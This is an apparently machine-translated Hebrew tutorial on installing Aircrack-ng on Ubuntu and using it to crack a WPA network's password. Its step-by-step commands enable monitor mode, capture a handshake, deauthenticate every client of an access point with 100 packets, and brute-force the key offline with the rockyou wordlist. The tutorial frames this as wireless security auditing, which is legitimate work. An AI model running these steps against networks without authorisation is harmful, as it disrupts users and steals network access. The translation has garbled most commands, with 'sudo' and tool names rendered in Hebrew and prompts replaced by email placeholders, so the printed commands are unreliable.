התקן את Aircrack באובונטו

Install Aircrack Ng Ubuntu



Aircrack-ng היא חבילה שלמה של כלים לביקורת אבטחה אלחוטית. ניתן להשתמש בו כדי לפקח, לבדוק, לפצח או לתקוף פרוטוקולי אבטחה אלחוטית כמו WEP, WPA, WPA2. Aircrack-ng מבוססת על שורת הפקודה וזמינה עבור Windows ו- Mac OS ומערכות הפעלה אחרות המבוססות על יוניקס. חבילת Aircrack-ng מכילה הרבה כלים המשמשים למטרות שונות, אך כאן נבחן רק כמה כלים חשובים המשמשים לעתים קרובות יותר בבדיקות אבטחה אלחוטית.

Airmon-ng







Airmon-ng משמש לניהול מצבי כרטיס אלחוטי וכדי להרוג תהליכים מיותרים תוך שימוש ב- airrack-ng. כדי לרחרח חיבור אלחוטי, עליך לשנות את כרטיס האלחוט שלך ממצב מנוהל למצב ניטור וניתן להשתמש ב- airmon-ng למטרה זו.



Airodump-ng



Airodump-ng הוא מריח אלחוטי שיכול ללכוד נתונים אלחוטיים מנקודת גישה אחת או יותר. הוא משמש לניתוח נקודות גישה בקרבת מקום ולכידת לחיצות ידיים.





משחק אוויר- ng

Airplay-ng משמש להתקפות שידור חוזר וכמזרק מנות. זה יכול להיות ביטול אימות משתמשים ממחשבי AP שלהם כדי ללכוד לחיצות ידיים.



Airdecap-ng

Airdecap-ng משמש לפענוח מנות WEP, WPA/WPA2 מוצפנות עם מפתח ידוע.

Aircrack-ng

Aircrack-ng משמש לתקיפת פרוטוקולים אלחוטיים של WPA/WEP על מנת למצוא את המפתח.

קל להתקין את Aircrack-ng באובונטו באמצעות APT. פשוט הקלד את הפקודה הבאה וזה יתקין את כל הכלים הזמינים בחבילת Aircrack-ng.

סודו עדכון apt-get
סודו apt-get להתקין מטוס אוויר-נג

נוֹהָג

במאמר זה נבחן במהירות כיצד להשתמש ב- aircrack-ng כדי לפצח רשת אלחוטית מוצפנת (TR1CKST3R בדוגמה זו) כדי למצוא את הסיסמה.

ראשית כל, רשום את כל הכרטיסים האלחוטיים הזמינים המחוברים למחשב באמצעות הפקודה 'iwconfig'.

נשתמש בכרטיס אלחוטי בשם 'wlxc83a35cb4546' בשם הדרכה זו (זה עשוי להיות שונה במקרה שלך). כעת, הרגו את כל התהליכים הפועלים על כרטיס אלחוטי באמצעות airmon-ng.

[מוגן בדוא'ל]: ~ $סודובדיקת airmon-ngלַהֲרוֹג
התחל את מצב הצג ב- 'wlxc83a35cb4546' על ידי הקלדה
[מוגן בדוא'ל]: ~ $סודוairmon-ng התחל wlxc83a35cb4546

כעת, airmon-ng התחיל את מצב הצג בכרטיס האלחוטי, הוא יופיע בשם אחר 'wlan0mon'. הפעל שוב את 'iwconfig' לרשימת פרטי האלחוט.

לאחר מכן, השתמש ב- airodump-ng כדי לראות נקודות גישה אלחוטיות בקרבת מקום ואת המאפיינים שלהן.

[מוגן בדוא'ל]: ~ $סודוairodump-ng wlan0mon

אתה יכול לצמצם את החיפוש באמצעות מסנני MAC (–bssid) וערוץ (-c). כדי ללכוד לחיצת יד (לחיצת יד מכילה סיסמה מוצפנת), עלינו לשמור את החבילות שלנו במקום כלשהו באמצעות אפשרות -כתב. סוּג,

[מוגן בדוא'ל]: ~ $סודוairodump-ng-bss6C: B7:49: FC:62: דואר 4
אחת עשרהwlan0mon--לִכתוֹב /tmp/לחיצת יד.כובע

-bss: כתובת ה- MAC של נקודת הגישה

: הערוץ של נקודת גישה[1-13]

--לִכתוֹב: מאחסן מנות שנתפסו במיקום מוגדר

כעת עלינו לאמת כל מכשיר מנקודת גישה זו באמצעות כלי Airplay-ng. לִכתוֹב

[מוגן בדוא'ל]: ~ $סודומשחק אוויר-ng-0 100 [MAC_ADD]wlan0mon

-a: ציין נקודות גישה ל- MAC למשחקי אוויר

-0: ציין מספר מנות deauth לשלוח

לאחר זמן מה, כל המכשירים ינותקו מאותה נקודת גישה, כאשר ינסו להתחבר מחדש, הפעלת airodump-ng תצלם את לחיצת היד. הוא יופיע בחלק העליון של ריצת airodump-ng.

לחיצת יד מאוחסנת בספריית ‘/tmp/’, ומכילה סיסמה מוצפנת שניתן לכפות עליה את האכזריות במצב לא מקוון באמצעות מילון. כדי לפצח את הסיסמה, נשתמש ב- Aircrack-ng. סוּג

[מוגן בדוא'ל]: ~ $סודומטוס אוויר-נג/tmp/לחיצת יד.כסה -01.כובע
/usr/לַחֲלוֹק/רשימות מילים/rockyou.txt
: ציין את מיקום המילון

Aircrack-ng יעבור ברשימת הסיסמאות, ואם היא תימצא, היא תציג את הסיסמה המשמשת כמפתח.

במקרה זה, aircrack-ng מצא את הסיסמה המשמשת '123456789'.

כעת, עצור את מצב הצג בכרטיס האלחוטי והפעל מחדש את מנהל הרשת.

[מוגן בדוא'ל]: ~ $סודוairmon-ng stop wlan0mon
[מוגן בדוא'ל]: ~ $סודומנהל רשת רשת הפעלה מחדש

סיכום

ניתן להשתמש ב- Aircrack-ng לביקורת אבטחה אלחוטית או לפיצוח סיסמאות שנשכחו. ישנם כמה כלים דומים אחרים הזמינים למטרה זו כמו Kismet אך aircrack-ng ידוע יותר בזכות תמיכה טובה, צדדיות ובעל מגוון רחב של כלים. יש לו ממשק שורת פקודה קל לשימוש הניתן לאוטומציה בקלות באמצעות כל שפת סקריפטים כמו פייתון.